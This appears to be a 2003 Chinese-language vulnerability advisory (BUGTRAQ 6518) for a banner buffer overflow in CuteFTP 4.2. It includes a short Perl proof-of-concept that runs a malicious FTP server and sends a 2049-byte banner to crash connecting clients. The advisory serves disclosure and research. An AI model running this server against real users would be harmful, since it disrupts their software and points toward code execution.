发布日期：2003-01-04
更新日期：2003-01-09

受影响系统：

globalSCAPE CuteFTP 4.2
    - Microsoft Windows NT 4.0
    - Microsoft Windows NT 3.5.1
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000

描述：

---

BUGTRAQ  ID: 6518

CuteFTP是一款基于Windows的文件传输协议客户端。

CuteFTP不能正确处理超长FTP旗标(banner)，远程攻击者可以利用这个漏洞在自己控制的服务器上构建恶意旗标数据，诱使用户访问时使CuteFTP发生缓冲区溢出。

CuteFTP在处理超过2048字节的FTP旗标(banner)时会触发缓冲区溢出，攻击者精心构建恶意FTP旗标，当客户端访问恶意服务器时，可能以执行CuteFTP用户权限在系统上执行任意指令。

<*来源：D4rkGr3y （grey_1999@mail.ru）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104171771131466&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

D4rkGr3y （grey_1999@mail.ru）提供了如下测试方法：

#!/usr/bin/perl
######################################################
#Here is an example of ftp-server. It will freeze each
#CuteFTP-user, that try to connect to it.
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "2049";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen
=> 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}
#EOF

建议：

---

厂商补丁：

globalSCAPE
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.globalscape.com

浏览次数：4388
严重程度：0（网友投票）